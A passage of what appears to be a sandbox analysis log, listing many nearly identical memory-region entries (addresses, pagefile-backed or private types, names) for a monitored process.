= 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11532 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11533 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11534 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11535 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11536 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11537 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11538 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11539 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11540 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11541 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11542 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11543 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11544 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11545 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11546 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11547 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11548 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11549 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11550 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11551 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11552 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11553 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11554 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11555 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11556 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11557 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11558 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11559 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11560 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11580 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11581 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11585 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11586 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11587 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11588 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11589 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11590 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11591 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11592 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11593 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11594 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11595 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11596 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11597 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11598 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11599 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11600 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11602 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11603 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11604 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11605 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11606 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11608 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11609 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11610 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11611 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11612 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11613 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11614 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11621 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11622 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11625 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11626 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11630 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11631 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11632 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11633 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11634 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11635 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11636 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11637 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11638 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11639 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11640 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11641 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11642 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11643 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11644 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11645 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11646 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11647 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11648 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11649 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11650 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11651 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11652 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11653 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11654 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11655 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11656 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11657 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11658 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11659 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11660 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11661 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11662 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11663 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11664 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11665 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11666 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11667 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11668 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11669 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11670 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11671 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11672 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11673 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11674 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11675 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11676 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11704 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11705 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11708 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" 